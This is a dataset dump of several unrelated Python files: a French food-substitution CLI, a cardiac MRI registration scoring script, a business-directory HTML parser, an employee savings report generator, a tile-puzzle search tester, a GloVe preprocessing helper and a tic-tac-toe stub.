/usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\nTheRightFood app Command Line Interface\nreleased under MIT License\nby Stephanie BLANCHET stephanie.blanchet.it@gmail.com\n\nPython 3.7 script\nfiles: explorer.py, finder.py, organizer.py, user.py, settings.py,\ntab_builder.py, db_builder.py, cat_updater.py, mysql_connect.py\n\"\"\"\n\n\nfrom modules.tab_builder import *\nfrom modules.organizer import *\n\n\ndef main():\n \"\"\"\n This module coordinates all other user-dependent modules.\n \"\"\"\n choose = Explorer()\n user = User()\n find = Finder(choose)\n sort = Organizer(find.codes, user)\n\n print(\"\"\"\n ---------------------------------\n Bienvenue sur votre application !\n ---------------------------------\n \"\"\")\n\n def restart():\n choice = input(\"\"\"\n __________\n\n 1 - Je souhaite effectuer une nouvelle recherche. \n 2 - Je souhaite voir mes aliments substitués.\n 3 - Je quitte l'application, merci !\n \n \"\"\")\n if choice == '1':\n choose.item.clear()\n find.codes.clear()\n select_cat()\n if choice == '2':\n if not user.info:\n user.case()\n sort.display_selection()\n restart()\n else:\n sort.display_selection()\n restart()\n if choice == '3':\n print('\\n\\t\\tA bientôt !')\n quit()\n else:\n print(alert_3)\n restart()\n\n def opt_favorite():\n if not find.results.empty:\n choice = input(\"\"\"\n __________\n \n Souhaitez-vous enregistrer un produit dans vos favoris ? (OUI = 1 / NON = 2)\n \n \"\"\")\n if choice == '1':\n if not user.info:\n user.case()\n sort.save_selection()\n restart()\n else:\n sort.save_selection()\n restart()\n if choice == '2':\n restart()\n else:\n print(alert_1)\n opt_favorite()\n else:\n select_scenario()\n\n def select_scenario():\n find.filter()\n opt_favorite()\n sort.save_selection()\n restart()\n\n def select_cat():\n choose.search_cat()\n check = 'SELECT COUNT(*) FROM product WHERE category = \"{}\"'.format(choose.item[0])\n cursor.execute(check)\n available_cat = cursor.fetchone()\n if available_cat[0] == 0:\n print(\"\"\"\n *** Cet aliment n'est pas encore dans notre base. ***\n Merci de patienter. 
Nous collectons les données nécessaires.\n \"\"\")\n collect = Builder(choose)\n collect.builder()\n select_scenario()\n else:\n select_scenario()\n\n def start():\n choice = input(\"\"\"\n Que souhaitez-vous faire ?\n\n 1 - Substituer un aliment\n 2 - Retrouver mes aliments substitués\n \n \"\"\")\n if choice == '1':\n select_cat()\n if choice == '2':\n user.log_in()\n sort.display_selection()\n restart()\n else:\n print(alert_1)\n start()\n\n start()\n\nif __name__ == '__main__':\n main()\n","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"437582337","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 8 13:33:43 2018\n\n@author: pourasgh\n\"\"\"\n\n\nimport nibabel\nfrom matplotlib import pyplot as plt\nimport os\nimport numpy as np\nfrom Config import *\nfrom STN import *\nimport tensorflow as tf\nfrom PIL import Image\nfrom scipy.spatial.distance import directed_hausdorff\n\n\nconfig = Config(is_train= True)\n\ndispm_dir = config.dispmDir\n\n\n\n\nfixed= True\nKorM=1\npaitent_num=2\ngt_frame =12\nfor slice_ in [config.sliceNum]:\n str3 =r'/home/ameneh/UofA/git/DIRegistration_Manifold/tmp/tmp_'\n str4 =\"/lr_1E-05,lr_1E-05,bn=false,do=true,usefc,1,_,\"\n str4_1 =\"/lr_1E-05,lr_1E-05,bn=false,do=true,use_mr2,1,_,\"\n strdtat = r'/home/ameneh/UofA/Datasets/ACDC/Diagnosis/training/patient00'\n frame_1 =strdtat + str(paitent_num)+\"/patient00\" +str(paitent_num)+'_frame01_gt.nii.gz' \n frame_12 = strdtat + str(paitent_num)+\"/patient00\" +str(paitent_num)+'_frame' + str(gt_frame)+'_gt.nii.gz'\n dataFileDice = strdtat + str(paitent_num)+\"/patient00\" +str(paitent_num)+'_4d.nii.gz'\n\n\n \n image_mr = nibabel.load(dataFileDice)\n data_im = image_mr.get_data()\n cardiacnumofimages = data_im.shape[3]\n # Load MR data from file\n image_mr01 = nibabel.load(frame_1)\n data_im01 = image_mr01.get_data()\n #data_im01 = data_im01[:,:,5]\n image_mr12 = nibabel.load(frame_12)\n data_im12 = image_mr12.get_data()\n \n \n \n \n \n \n # Iterate through slices\n # for slice_ in range(4,5): \n \n \n \n # st=r\"/home/ameneh/UofA/git/DIRegistration_Manifold/tmp/tmp_0000/lr_1E-04,lr_1E-04,bn=false,do=true,usefc,1,_,5,_,18500.npy\"\n for fdmname2 in ['/home/ameneh/UofA/git/NonRigidReg/MultiResolution/tmp/tmp_27_3/lr_1E-06,1,_,1,_,10000.npy']:#[str3 + str(paitent_num) + str(slice_)+str4+ str(slice_)+',_,12000.npy']:\n #str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,2000.npy',\n #str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,3000.npy']:\n #,str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,4000.npy'\n #,str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,5000.npy']:# range(data_im.shape[2]): \n print(fdmname2)\n if not os.path.exists(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)):\n os.mkdir(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_))\n \n \n \n file = open(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+\"/test1file.txt\",\"a+\") \n SeriesInstanceUID = \"{}.{:04d}\".format(os.path.splitext(os.path.split(dataFileDice)[1])[0],slice_)\n fdmname = str(os.path.join(config.dispmDir, SeriesInstanceUID, \"DM-{:04d}.bin\".format(slice_*cardiacnumofimages)) ) \n #fdmname2 = r'/home/ameneh/UofA/git/DIRegistration_Manifold/tmp_fc_best/lr_1E-04,lr_1E-04,bn=false,do=true,usefc,1000.npy'\n #fdmname2= 
r'/home/ameneh/UofA/git/DIRegistration_Manifold/tmp/tmp_1/lr_1E-04,lr_1E-04,bn=false,do=true,usefc,1,_,1,_,3000.npy'#home/ameneh/UofA/git/DIRegistration_Manifold/tmp/lr_1E-06,lr_1E-06,bn=false,do=true,usefc,41000.npy'\n \n # check if there is a displacement matrix\n if os.path.isfile(fdmname2): \n \n DM_i = np.load(open(fdmname, 'rb')) \n DM_ = np.load(open(fdmname2, 'rb'))\n # DM_ =[]\n DM_fx, DM_fy, DM_bx, DM_by, bb = DM_i[\"DM_fx\"], DM_i[\"DM_fy\"], DM_i[\"DM_bx\"], DM_i[\"DM_by\"], DM_i[\"bb\"]\n print(DM_fx.shape)\n DM_fx = np.swapaxes(DM_fx, 1, 2)\n DM_fy = np.swapaxes(DM_fy, 1, 2)\n DM_fx = np.expand_dims(DM_fx , -1)\n DM_fy = np.expand_dims(DM_fy , -1)\n DM = np.concatenate((DM_fx, DM_fy),axis = 3)\n \n \n #print(\"DM \", disp.shape)\n rect = np.array(bb)\n rect = rect.astype('int')\n rect = np.round(rect)\n \n sess = tf.Session()\n image = data_im01[:,:,slice_]\n # image = image/255\n image = image.astype('float32')\n \n if fixed:\n def1 = 60 - (rect[1]-rect[0])\n def2 = 60- (rect[3]-rect[2])\n if (def1 % 2) == 0 :\n def1_1 = np.int(def1/2)\n def1_2 = np.int(def1/2)\n else:\n def1_1 =np.int((def1+1)/2)\n def1_2 = np.int((def1-1)/2)\n \n if (def2 % 2) == 0 :\n def2_1 = np.int(def2/2)\n def2_2 = np.int(def2/2)\n else:\n def2_1 = np.int((def2+1)/2)\n def2_2 = np.int((def2-1)/2)\n \n if fixed: \n im_warp = image[rect[0]-def1_1:rect[1]+def1_2, rect[2]-def2_1:rect[3]+def2_2]\n else:\n im_warp = image[rect[0]:rect[1], rect[2]:rect[3]]\n \n print(data_im.shape)\n \n# source_im = data_im[:, :,slice_,0]\n# print(source_im.shape)\n# source_im = source_im.astype('float32')\n# source_im = source_im[rect[0]:rect[1], rect[2]:rect[3]]\n# \n# \n# source_target = data_im[:,:,slice_,gt_frame]\n# source_target = source_target.astype('float32')\n# source_target = source_target[rect[0]:rect[1], rect[2]:rect[3]]\n \n image1 = data_im12[:,:,slice_]\n image1 = image1.astype('float32')\n if fixed:\n im_target = image1[rect[0]-def1_1:rect[1]+def1_2, rect[2]-def2_1:rect[3]+def2_2]\n else:\n im_target = image1[rect[0]:rect[1], rect[2]:rect[3]] \n im_target = np.squeeze(im_target)\n \n \n pixelMap = im_warp\n pixelMap2 = im_target\n print(im_warp.shape)\n im_mov= tf.placeholder(tf.float32, [1,im_warp.shape[0],im_warp.shape[1]])\n dispM = tf.placeholder(tf.float32, [1,im_warp.shape[0],im_warp.shape[1],2])\n #####################################################################\n \n for i in range(im_warp.shape[0]):\n for j in range(im_warp.shape[1]):\n #print(float(im_warp[i,j]))\n if float(im_warp[i,j]) <3:\n pixelMap[i,j] =255\n else:\n pixelMap[i,j] = 0\n # print(\"frame 0 \")\n # plt.imshow(pixelMap, cmap = 'gray')\n # plt.show()\n \n for i in range(im_target.shape[0]):\n for j in range(im_target.shape[1]):\n #print(float(im_warp[i,j]))\n if float(im_target[i,j]) <3:\n pixelMap2[i,j] =255\n else:\n pixelMap2[i,j] = 0\n \n # print(\"frame 12 \")\n # plt.imshow(pixelMap2, cmap = 'gray')\n # plt.show()\n # \n im_warp = pixelMap/255\n im_warp = np.expand_dims(im_warp, 0)\n# source_im = np.expand_dims(source_im,0)\n im_target = pixelMap2/255\n #im_target2 = np.expand_dims(im_target, 0)\n \n im = im_warp\n im3 =im_warp\n if KorM == 0:\n for i in range (gt_frame):\n disp=DM[i,:,:,:]\n source_im = data_im[:, :,slice_,i]\n disp = np.expand_dims(disp,0)\n im_warp2 =STN(im_mov, dispM)\n im=sess.run(im_warp2, {im_mov:im, dispM : disp})\n im2 = np.squeeze(im)\n \n \n \n \n \n \n plt.figure()\n plt.imshow(im2, 'gray', interpolation='none', alpha=0.6)\n plt.imshow(im_target, 'gray', interpolation='none', alpha=0.3)\n \n 
str2 = \"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/K' + '.png'\n \n plt.savefig(str2, bbox_inches='tight')\n \n \n plt.figure(2)\n plt.imshow(im_target, 'gray')\n plt.show()\n file.write( str(np.sum(im[im_target2==1])*2.0 / (np.sum(im)+ np.sum(im_target2)))+\"\\r\\n\")\n print( np.sum(im[im_target2>0])*2.0 / (np.sum(im)+ np.sum(im_target2)))\n #break\n # for i in range (12):\n # \n # print(i)\n # dispm=DM[i,:,:,:]\n # dispm = np.expand_dims(dispm,0)\n # im_warp3 =STN(im_mov, dispm)\n # im3=sess.run(im_warp3, {im_mov:im3, dispM : dispm})\n # im4 = np.squeeze(im3)\n # \n #plt.imshow(im2, cmap = 'gray' ) \n \n else:\n from skimage import measure\n# from scipy import interpolate\n from scipy import interpolate as itp\n import scipy.ndimage.morphology as ndimage\n\n\n\n dx = DM_[10,:,:,0]\n dy = DM_[10,:,:,1]\n scipy.io.savemat('dxam.mat', {'mydata': dx})\n scipy.io.savemat('dyam.mat', {'mydata': dy})\n \n \n\n for i in range (gt_frame):\n \n print(i)\n disp=DM_[i,:,:,:]\n #source image in orf=der to show countor on the main image\n \n dx = DM_[i,:,:,0]\n dy = DM_[i,:,:,1]\n strmatx =\"dxam\"+str(i)+\".mat\" \n strmaty =\"dyam\"+str(i)+\".mat\" \n scipy.io.savemat(strmatx, {'mydata': dx})\n scipy.io.savemat(strmaty, {'mydata': dy})\n \n #\n print(slice_, \"disp: \", disp.shape)\n disp = np.expand_dims(disp,0)\n im_warp2 =STN(im_mov, dispM)\n im=sess.run(im_warp2, {im_mov:im, dispM : disp})\n \n #source_im=sess.run(im_warp2, {im_mov:source_im, dispM : disp})\n im2 = np.squeeze(im)\n# im2 = ndimage.grey_dilation(im2, size=(4,6))\n# im2 = ndimage.grey_erosion(im2, size=(1,1))\n plt.imshow(im2, cmap=plt.cm.gray)\n plt.show()\n #find countor \n contours = measure.find_contours(im2,0.8)\n # Display the image and plot all contours found\n fig, ax = plt.subplots()\n \n\n# for n, contour in enumerate(contours):\n# ax.plot(contour[:, 1], contour[:, 0], linewidth=2)\n\n# ax.axis('image')\n# ax.set_xticks([])\n# ax.set_yticks([])\n# plt.show()\n #show countor ion source image \n source_im = data_im[:, :,slice_,i]\n if fixed: \n source_im = source_im[rect[0]-def1_1:rect[1]+def1_2, rect[2]-def2_1:rect[3]+def2_2]\n source_im = source_im.astype('float32')\n# source_im = source_im[rect[0]-50:rect[1]+50, rect[2]-50:rect[3]+50]\n z = (plt.contour(im2, [ 0.8]))\n# fig3 = plt.figure()\n# ax = fig3.add_subplot(1, 1, 1)\n# ax.set_xticks([])\n# ax.set_yticks([])\n plt.imshow(source_im, cmap=plt.cm.gray)#interpolation='nearest',\n # If you want to plot the controus yourself, you can do it like this...\n index = 0 # look at the first contour\n line = z.collections[index].get_paths()[0].vertices\n \n line = np.copy(line) # make a copy so manipulations don't change the original contour\n line[:,0] += 50.0 # shift it to the right (as an example of something we can do only easily with the data for the contour line\n line[:,1] +=50.0\n mytck,myu=itp.splprep([line[:,0],line[:,1]])\n xnew,ynew= itp.splev(np.linspace(0,1,22),mytck)\n# plt.plot(xnew[:],ynew[:],'b-')\n #plt.plot(line[:,0], line[:,1], 'r-')\n if fdmname2.endswith('.npy'):\n fdmname2 = fdmname2[:-4]\n fdmname2 = fdmname2[105:]\n plt.savefig(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 +'c.png', bbox_inches='tight')\n plt.show()\n# \n \n \n \n \n plt.figure()\n \n plt.imshow(im2, 'gray', interpolation='none', alpha=0.8)\n plt.imshow(im_target, 'gray', interpolation='none', alpha=0.4)\n if fdmname2.endswith('.npy'):\n fdmname2 = fdmname2[:-4]\n fdmname2 = fdmname2[105:]\n str2 = 
\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 + '_10.png'\n print(str2)\n \n plt.savefig(str2, bbox_inches='tight')\n \n plt.figure(2)\n plt.imshow(im_target, 'gray')\n \n plt.savefig(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 + '_10_gt.png', bbox_inches='tight')\n \n plt.figure(3)\n plt.imshow(im2, 'gray')\n \n plt.savefig(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 + '_10_re.png', bbox_inches='tight')\n #plt.show()\n \n# for i in range (12):\n# \n# print(i)\n# dispm=DM[i,:,:,:]\n# dispm = np.expand_dims(dispm,0)\n# im_warp3 =STN(im_mov, dispm)\n# im3=sess.run(im_warp3, {im_mov:im3, dispM : dispm})\n# im4 = np.squeeze(im3)\n# \n #plt.imshow(im2, cmap = 'gray' ) \n# im = np.squeeze(im) \n file.write(str( np.sum(im2[im_target==1])*2.0 / (np.sum(im2)+ np.sum(im_target)))+\"\\r\\n\")\n print( np.sum(im2[im_target>=1])*2.0 / (np.sum(im2)+ np.sum(im_target)))\n \n \n cnt =contours[0]\n contours_target= measure.find_contours(im_target,0.8)\n cnt2 =contours_target[0]\n \n ax.plot(cnt[:, 1], cnt[:, 0], linewidth=2)\n ax.plot(cnt2[:, 1], cnt2[:, 0], linewidth=2)\n #plt.show()\n \n print(directed_hausdorff(contours[0],contours_target[0]))\n# file.write(str( np.sum(im[im_target==1])*2.0 / (np.sum(im)+ np.sum(im_target)))+\"\\r\\n\")\n# print(scip np.sum(im[im_target>=1])*2.0 / (np.sum(im)+ np.sum(im_target)))\n \n \n \n else:\n continue\n \n file.close()\n \n# print( np.sum(im3[im_target==0])*2.0 / (np.sum(im3)+ np.sum(im_target) )) \n","sub_path":"Dice.py","file_name":"Dice.py","file_ext":"py","file_size_in_byte":15687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"546495037","text":"from bs4 import BeautifulSoup\nimport re\n\nclass Parser(object):\n def parseToGetRegionUrls(self, content, flag):\n soupObj = BeautifulSoup(content, \"html.parser\");\n allLinks = None;\n\n if(flag == \"province\"):\n allLinks = soupObj.find(\"div\", {\"class\": \"topprovince\"}).find_all(\"a\");\n if(flag == \"city\"):\n allLinks = soupObj.find(\"dl\", {\"id\": \"clist\"}).find_all(\"a\");\n\n allRegionUrl = set();\n for link in allLinks:\n url = link.get(\"href\");\n if(url is not None):\n allRegionUrl.add(url);\n return allRegionUrl;\n\n\n def parseToGetCategoryUrl(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n allLinks = soupObj.find(\"div\", {\"class\": \"main\"}).find_all(\"a\");\n\n allCategoryUrls = set();\n for link in allLinks:\n url = link.get(\"href\");\n if(url is not None):\n allCategoryUrls.add(url);\n\n return allCategoryUrls;\n\n def parseToGetBriefPageUrls(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n try:\n allLinks = soupObj.find(\"div\", {\"class\": \"page_tag\"}).find_all(\"a\");\n allNextPageUrls = set();\n for link in allLinks:\n url = link.get(\"href\");\n if(url is not None):\n allNextPageUrls.add(url);\n return allNextPageUrls;\n\n except:\n return None;\n\n def parseToGetDeatilPageUrls(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n patGongsi = re.compile(r\"http:\\/\\/b2b\\.huangye88\\.com\\/gongsi\\/\\d*\\/$\");\n patQiye = re.compile(r\"http:\\/\\/b2b\\.huangye88\\.com\\/qiye\\d*\\/$\");\n links = soupObj.find(\"div\", {\"class\": \"mach_list2\"}).find(\"form\", {\"id\": \"jubao\"}).find_all(\"a\");\n detailPageUrls = set();\n\n for link in links:\n url = link.get(\"href\");\n if(url is not None and (re.match(patGongsi, url) or re.match(patQiye, url))):\n detailPageUrls.add(url);\n 
return detailPageUrls;\n\n def parseToGetCompanyName(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n text = soupObj.find(\"h1\", {\"class\": \"big\"}).get_text();\n return text;\n\n def parseToGetCompanyDetails(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n text = soupObj.find(\"ul\", {\"class\": \"con-txt\"}).get_text();\n return text;\n\n def parseToGetCompanyContact(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n text = soupObj.find(\"ul\", {\"class\": \"con-txt\"}).get_text();\n return text;\n\n\n # 文件路径相关\n def parseToGetCatalogueName(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n nameStr = soupObj.find(\"div\", {\"class\": \"subNav\"}).get_text();\n nameList = nameStr.split(\" \");\n\n return nameList[-2];\n\n","sub_path":"HuangYe/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"437210084","text":"import pandas as pd\nimport numpy as np\nimport xlsxwriter\nfrom pandas.tseries.offsets import MonthEnd\nimport datetime\nfrom datetime import datetime, timedelta\nimport calendar\n\n\ndef monthdelta(d1, d2):\n \"\"\"\n Returns the difference of two datetimes in months\n :param datetime d1: the earlier date\n :param datetime d2: the later date\n :return: the month difference\n :rtype: int\n \"\"\"\n delta = 0\n while True:\n mdays = calendar.monthrange(d1.year, d1.month)[1]\n d1 += timedelta(days=mdays)\n if d1 <= d2:\n delta += 1\n else:\n break\n return delta\n\n\nclass Transaksi:\n \"\"\"\n Transaksi holds the information of a transaction which conveys its amount and its transaction type\n \"\"\"\n def __init__(self, jumlah, tipe):\n \"\"\"\n Initializes the Transaksi object\n :param float jumlah: the amount of transaction\n :param str tipe: the type of transaction\n \"\"\"\n self.jumlah = jumlah\n self.tipe = tipe\n\n def __repr__(self):\n \"\"\"\n To String method\n :return: the string representation of Transaksi\n \"\"\"\n return \"({} sejumlah Rp{})\".format(self.tipe, self.jumlah)\n\n\nclass EmployeeBalance:\n \"\"\"\n Keeps track of the employee's balance throughout the date\n \"\"\"\n INTEREST = 0.012 # the interest rate applied to daily average balance at the end of each month\n\n def __init__(self):\n \"\"\"\n Initializes EmployeeBalance\n \"\"\"\n self.balance = 0\n self.currDate = None\n\n self.__startDate = None\n self.__dailyBalance = 0\n self.__balanceAccumulation = 0\n\n def update(self, date, transaction, amount):\n \"\"\"\n Updates the current balance given the transaction type, amount, and date\n :param datetime date: date of the transaction\n :param str transaction: the type of transaction\n :param float amount: the amount of transaction\n :return: the current employee balance\n :rtype: float\n \"\"\"\n if self.currDate is None or self.__startDate is None:\n self.__startDate = pd.to_datetime(date, format=\"%Y%m%d\")\n self.currDate = pd.to_datetime(date, format=\"%Y%m%d\")\n if date.month != self.currDate.month: # edge case if a month is skipped\n monthly_interest = self.update_monthly(date)\n print(\"monthly interest added = Rp{}\".format(monthly_interest))\n\n if date != self.currDate:\n time_range = date - self.currDate\n # print(time_range.days)\n # print(date, end = '')\n self.__balanceAccumulation += self.balance * time_range.days\n self.currDate = pd.to_datetime(date, format=\"%Y%m%d\")\n if transaction == 'Tabungan':\n self.balance += 
amount\n elif transaction == 'Tarikan ':\n self.balance -= amount\n # print('balance: {}'.format(self.balance))\n return self.balance\n\n def update_monthly(self, date):\n \"\"\"\n Gets called when there is a change in month\n :param datetime date: the current transaction's date\n :return: the monthly added interest\n :rtype: float\n \"\"\"\n end_of_month = calendar.monthrange(self.currDate.year, self.currDate.month)[1]\n end_of_month = datetime(self.currDate.year, self.currDate.month, end_of_month)\n time_range = end_of_month - self.currDate\n self.__balanceAccumulation += self.balance * time_range.days\n time_difference = end_of_month.day\n if time_difference is not 0:\n monthly_interest = self.__balanceAccumulation / time_difference * self.INTEREST\n else:\n monthly_interest = 0\n month_difference = monthdelta(self.__startDate, date) + 1\n self.balance += monthly_interest * month_difference\n self.__balanceAccumulation = 0\n self.__startDate = pd.to_datetime(date, format=\"%Y%m%d\") + MonthEnd(1)\n self.currDate = end_of_month\n return monthly_interest\n\n\ndef load_file(data_frame):\n \"\"\"\n Loads the excel file into cleaned up data structure that groups transactions by NIK and transaction date\n :param dataFrame data_frame: the data frame containing the excel document\n :return: the cleaned up data structure version of the excel file\n :rtype: Map>>\n \"\"\"\n\n nik_dict = dict() # dictionary that contains all the transaction information\n for index, row, in data_frame.iterrows():\n if row['NIK'] not in nik_dict.keys():\n nik_dict[int(row['NIK'])] = {row['Tanggal']: []}\n elif row['Tanggal'] not in nik_dict[int(row['NIK'])].keys():\n nik_dict[int(row['NIK'])][row['Tanggal']] = []\n curr_transaksi = nik_dict[int(row['NIK'])][row['Tanggal']]\n jumlah = abs(row['Masuk'] + row['Keluar']) # merge these columns to one\n curr_transaksi.append(Transaksi(jumlah, row['Transaksi']))\n print(nik_dict)\n\n return nik_dict\n\n\ndef generate_report(nik_dict):\n \"\"\"\n Generates the report that also tracks employee balances for each employee\n :param Map>> nik_dict: the data frame as a data structure\n \"\"\"\n workbook = xlsxwriter.Workbook('nik_report.xlsx')\n date_format = workbook.add_format({'num_format': 'dd/mm/yy'})\n money_format = workbook.add_format({'num_format': 'Rp#,##0.00'})\n\n for nik in nik_dict.keys():\n print(\"\\n\\nNIK {}\".format(nik))\n employee_balance = EmployeeBalance()\n curr_sheet = workbook.add_worksheet(\"NIK {}\".format(nik))\n curr_sheet.set_column(1, 1, 12)\n curr_sheet.set_column(3, 3, 12)\n curr_sheet.write(0, 0, \"Tanggal\")\n curr_sheet.write(0, 1, \"Jumlah Transaksi\")\n curr_sheet.write(0, 2, \"Tipe Transaksi\")\n curr_sheet.write(0, 3, \"Saldo\")\n row = 0\n col = 0\n for date in nik_dict[nik].keys():\n item_list = nik_dict[nik][date]\n # print(item)\n for item in item_list:\n # Filters the types of transactions to be written\n if item.tipe == \"Tabungan\" or item.tipe == \"Tarikan \":\n row += 1\n curr_sheet.write(row, col, date, date_format)\n curr_sheet.write(row, col + 1, item.jumlah, money_format)\n curr_sheet.write(row, col + 2, item.tipe)\n balance = employee_balance.update(date, item.tipe, item.jumlah)\n curr_sheet.write(row, col + 3, balance, money_format)\n\n workbook.close()\n\n\nif __name__ == \"__main__\":\n df = pd.read_excel('toBeParsed.xlsx', sheet_name='Kas')\n df = df[np.isfinite(df['NIK'])] # dropping nonexistent NIKs\n df['Masuk'].fillna(0, inplace=True) # replace all NaN with 0\n df['Keluar'].fillna(0, inplace=True) # replace all NaN 
with 0\n\n nik_dict = load_file(df)\n # print(nik_dict)\n\n generate_report(nik_dict)\n","sub_path":"transaction_parser.py","file_name":"transaction_parser.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"125743184","text":"import numpy as np\nimport queue\nfrom collections import deque\nfrom tilepuzzle import *\nfrom Assignment1 import *\nimport time\n\noutpath = \"/Users/Ben/Desktop/Tile_Results/\"\noutname = \"results.txt\"\n\nBFS_moves_out=\"BFS_moves.txt\"\nBFS_times_out=\"BFS_times.txt\"\naStar_moves_out=\"aStar_moves.txt\"\naStar_times_out=\"aStar_times.txt\"\nmanhattan_moves_out=\"manhattan_moves.txt\"\nmanhattan_times_out=\"manhattan_times.txt\"\n\ndef tester(num_iterations):\n\n print(\"hello\")\n BFS_moves = []\n BFS_times = []\n aStar_moves = []\n aStar_times = []\n manhattan_moves = []\n manhattan_times = []\n\n output = open(outpath+outname,'w')\n\n BFS_moves_write = open(outpath+BFS_moves_out,'w')\n BFS_times_write = open(outpath+BFS_times_out,'w')\n\n aStar_moves_write = open(outpath+aStar_moves_out,'w')\n aStar_times_write = open(outpath+aStar_times_out,'w')\n\n manhattan_moves_write = open(outpath+manhattan_moves_out,'w')\n manhattan_times_write = open(outpath+manhattan_times_out,'w')\n\n output.write(\"test results:\"+\"\\n\")\n\n for i in range(num_iterations):\n start_time = time.time()\n curr_BFS = breadthFirst(100,i)\n\n if curr_BFS == \"FAIL\":\n print(\"current test ran into a fail. stopping test run.\")\n return\n\n BFS_moves_write.write(str(curr_BFS)+\"\\n\")\n BFS_moves.append(curr_BFS)\n\n BFS_times_write.write(str(time.time()-start_time)+\"\\n\")\n BFS_times.append(time.time()-start_time)\n BFS_moves_write.close()\n BFS_times_write.close()\n\n for i in range(num_iterations):\n start_time = time.time()\n curr_aStar = aStar_One(100,i)\n\n if curr_aStar == \"FAIL\":\n print(\"current test ran into a fail. stopping test run.\")\n return\n\n aStar_moves_write.write(str(curr_aStar)+\"\\n\")\n aStar_moves.append(curr_aStar)\n\n aStar_times_write.write(str(time.time()-start_time)+\"\\n\")\n aStar_times.append(time.time()-start_time)\n aStar_moves_write.close()\n aStar_times_write.close()\n\n for i in range(num_iterations):\n start_time = time.time()\n curr_manhattan = aStar_Manhattan(100,i)\n\n if curr_manhattan == \"FAIL\":\n print(\"current test ran into a fail. 
stopping test run.\")\n return\n\n manhattan_moves_write.write(str(curr_manhattan)+\"\\n\")\n manhattan_moves.append(curr_manhattan)\n\n manhattan_times_write.write(str(time.time()-start_time)+\"\\n\")\n manhattan_times.append(time.time()-start_time)\n manhattan_moves_write.close()\n manhattan_times_write.close()\n\n BFS_m_avg = sum(BFS_moves)/len(BFS_moves)\n BFS_t_avg = sum(BFS_times)/len(BFS_times)\n output.write(\"BFS moves average: \"+str(BFS_m_avg)+\"\\n\")\n output.write(\"BFS time average: \"+str(BFS_t_avg)+\"\\n\")\n output.write(\"----------\"+\"\\n\")\n\n aStar_m_avg = sum(aStar_moves)/len(aStar_moves)\n aStar_t_avg = sum(aStar_times)/len(aStar_times)\n output.write(\"aStar moves average: \"+str(aStar_m_avg)+\"\\n\")\n output.write(\"aStar time average: \"+str(aStar_t_avg)+\"\\n\")\n output.write(\"----------\"+\"\\n\")\n\n manhattan_m_avg = sum(manhattan_moves)/len(manhattan_moves)\n manhattan_t_avg = sum(manhattan_times)/len(manhattan_times)\n output.write(\"manhattan moves average: \"+str(manhattan_m_avg)+\"\\n\")\n output.write(\"manhattan time average: \"+str(manhattan_t_avg)+\"\\n\")\n output.close()\n\ntester(100)\n","sub_path":"Assignment_1/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"524822823","text":"import numpy as np\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\n\nfrom config import (\n REMOVE_DICT,\n ISOLATE_DICT,\n)\n\nTOKENIZER = TreebankWordTokenizer()\n\n\ndef handle_symbols(x):\n x = x.translate(REMOVE_DICT)\n x = x.translate(ISOLATE_DICT)\n return x\n\n\ndef handle_contractions(x):\n x = TOKENIZER.tokenize(x)\n return x\n\n\ndef fix_quote(x):\n x = [x_[1:] if x_.startswith(\"'\") else x_ for x_ in x]\n x = ' '.join(x)\n return x\n\n\ndef preprocess(x):\n # 1. Remove all symbols in the corpus that do not appear in the embeddings.\n x = handle_symbols(x)\n # 2. Handle contractions using the TreebankTokenizer.\n x = handle_contractions(x)\n # 3. 
Remove the apostrophe symbol at the beginning of the token words.\n x = fix_quote(x)\n return x\n\n\ndef build_matrix(word_index, glove_model, max_featrs):\n embedding_matrix = np.zeros((max_featrs + 1, 300))\n unknown_words = []\n\n for word, i in word_index.items():\n if i <= max_featrs:\n try:\n embedding_matrix[i] = glove_model[word]\n except KeyError:\n try:\n embedding_matrix[i] = glove_model[word.lower()]\n except KeyError:\n try:\n embedding_matrix[i] = glove_model[word.title()]\n except KeyError:\n unknown_words.append(word)\n return embedding_matrix, unknown_words\n","sub_path":"Lab1_Operationalizing_Pytorch_with_Mlflow/Team2/data_loader/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"263559869","text":"from pygame.locals import *\r\nfrom algorithm.tictactoeAlgorithm import *\r\n\r\n# initialize global variables\r\nXO = 'x' # <-- Variable to know which player are playing\r\nwinner = None # <-- Variable to know who is the winner \r\ndraw = 